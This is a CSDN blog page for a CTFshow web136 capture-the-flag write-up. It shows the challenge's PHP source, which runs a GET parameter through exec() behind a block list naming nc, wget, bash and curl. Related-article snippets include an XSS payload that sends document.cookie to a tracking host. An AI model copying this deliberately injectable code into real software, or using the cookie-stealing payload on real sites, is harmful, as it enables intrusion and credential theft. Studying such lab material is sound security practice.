CTFshow php特性 web136

最新推荐文章于 2023-10-09 09:51:04 发布
最新推荐文章于 2023-10-09 09:51:04 发布
阅读量2.1k 收藏 6
点赞数 2
分类专栏: CTFshow 文章标签: php bash 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/121997166
版权
本文介绍了CTF挑战Web136的解决过程,涉及PHP特性利用,如bash盲注和文件操作。解法包括使用`tee`命令创建文件,通过`sed`命令替换源码中的特定字符串,以及`xargs`配合`sed`进行批量文件修改。文中还提到了`curl`命令执行问题,并分享了参考资料。
摘要由CSDN通过智能技术生成

目录

源码

<?php
error_reporting(0);
function check($x){
   
    if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){
   
        die('too young too simple sometimes naive!');
    }
}
if(isset($_GET['c'])){
   
    $c=$_GET['c'];
    check($c);
    exec($c);
}
else{
   
    highlight_file(__FILE__);
}
最低0.47元/天 解锁文章
Kradress
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 1892
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
ctfshow-web入门-php特性web132-web136
最新发布
Welcome To Myon'Blog !
07-25 1431
mt_rand(1, 0x36D) 会生成一个 1 到 877(十六进制0x36D)的随机数,因此 $code === mt_rand(1,0x36D) 这个条件很难满足,因为每次都会生成一个新的随机数,$code 很难与这个随机数相等。tr -cd 'a-zA-Z0-9-' 这个命令会删除所有不是字母、数字、减号的内容,原本我想将大括号也保留,但是试了下不行。flag 分为了两段,flag1 和 flag2,拼接起来,字母都改成小写字母,添加上大括号即可。
CTFSHOW PHP特性篇 (下篇132-150)
羽的博客
10-21 4767
web132 if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){ $username = (String)$_GET['username']; $password = (String)$_GET['password']; $code = (String)$_GET['code']; if($code === mt_rand(1,0x
ctfshow web入门 php特性 web136-web140
m0_62207170的博客
10-09 448
ctfshow web入门 php特性 web136-web140
ctfshow学习记录-web入门(php特性127-136
龟速更新的九某人
07-26 1452
ctfshow学习记录-web入门(php特性web127-136
ctfshow学习记录-web入门(php特性137-146)
龟速更新的九某人
08-01 1247
ctfshow学习记录-web入门(php特性web137-web146)
ctfshow XSS漏洞web316-328
m0_62584974的博客
04-07 1872
2022/4/7 Web316 XSS 反射性XSS 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名 红框内的是临时的域名 然后在方框中输入: <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
CTFshow——PHP特性(下)
D.MIND 的博客
02-21 2314
目录:web132——逻辑运算符的优先级web133——curl -Fweb134——php变量覆盖web135—— >xx.txt 写文件web136—— tee命令 web132——逻辑运算符的优先级 打开是一个网站,访问robots.txt 得到指引/admin <?php #error_reporting(0); include("flag.php"); highlight_file(__FILE__); if(isset($_GET['username']) &&
CTFshow php特性 web101
Kradress的博客
12-14 789
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-22 00:26:48 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.php"); //fl
ctfshow php特性 web112
U_U520的博客
12-05 547
考点:php伪协议 绕过is_file+highlight_file 对于文件的检测 我们的目的是即不能让is_file检测出是文件,还要让 highlight_file可以识别为文件。这时候可以利用php伪协议。 可以直接用不带任何过滤器的filter伪协议 也可以用一些没有过滤掉的编码方式和转换方式 还有一些可以编码的,比如base64编码convert.base-encode64部分可以二次编码绕过(包含调用 时会解一次码)
CTFshow php特性 web108
Kradress的博客
12-15 289
目录源码思路ereg绕过flag题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-28 23:53:55 */ highlight_file(__FILE__); error_reporting(0); include("flag.php"); if
CTFshow php特性 web150
Kradress的博客
12-19 546
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-19 07:12:57 */ include("flag.php"); error_reporting(0); highlight_file(__FILE__); class CTFSHOW{
ctfshow web133和其他命令执行的骚操作
Firebasky的博客
10-15 4587
这里是总结自己最近遇到的命令执行题,感觉还是不错分享出来。也欢迎师傅们评论一些骚操作 1. ISITDTU QUALS 2020 REC <?php // error_reporting(E_ALL); // ini_set('display_errors', '1'); function trigonometric_check($code) { // Check length if (strlen($code) >= 0x100) {//256长度 retu.
CTFshow web入门——php特性
小元砸的博客
02-20 6358
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
CTFShow web入门123-150 (php特性(二))
lonmar的博客
12-05 5423
CTFSHOW PHP特性web123-150
TQLCTF-Simple PHP
qq_53460654的博客
02-21 726
注册登录,抓包发现有个地方有任意文件读取 读取index.php 关键代码 if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){ if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){ $_POST['punctuation'] = preg_replace("/[a-z,A-Z,0- 9>\?]/","",$_POST['pun
[TQLCTF2022] Simple PHP WP
A10ng_的博客
02-21 724
这个题很有意思,写shell的姿势比较好玩,我在之前搞渗透的时候同样遇到类似手法, 所以就记录一下。 打开题目是一个登录口,个人习惯,先测一下注入,发现是不存在的,然后注册一个号上去康康,这一康不得了,发现了有个功能点有任意文件读取,他是去加载本地文件的一个功能。并且文件的路径和文件名可控,在测试了/etc/passwd,成功读取了。 然后在fuzz了一下flag文件名没有结果后,继续尝试下一步,把所有的源码读出来,我首先读了这个功能点的源码。发现是用的file_get_contents函数,所以并不存在
CTF攻防世界web_simple_php20201010
高野02blog
10-10 484
simple_php [原理] php中有两种比较符号 === 会同时比较字符串的值和类型 == 会先将字符串换成相同类型,再作比较,属于弱类型比较 [目地] 掌握php的弱类型比较 [环境] windows [工具] firefox [步骤] 1.打开页面,进行代码审计,发现同时满足 $a==0 和 $a 时,显示flag1。 2.php中的弱类型比较会使’abc’ == 0为真,所以输入a=abc时,可得到flag1,如图所示。(abc可换成任意字符)。 3.is_numeric() 函数会判断如果是
ctfshow php特性
08-06
引用提到了"ctfshow-php特性-超详解(干货)",它是一篇关于ctfshow php的博客文章。引用和引用则展示了两段关于ctfshow php特性的代码。其中引用是一段关于RCE(远程代码执行)的代码,而引用是一段关于反射类和命令执行的代码。这些引用都提到了ctfshow php特性,但并没有详细说明这些特性是什么。由于没有更多的上下文信息,我无法提供更详细的答案。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值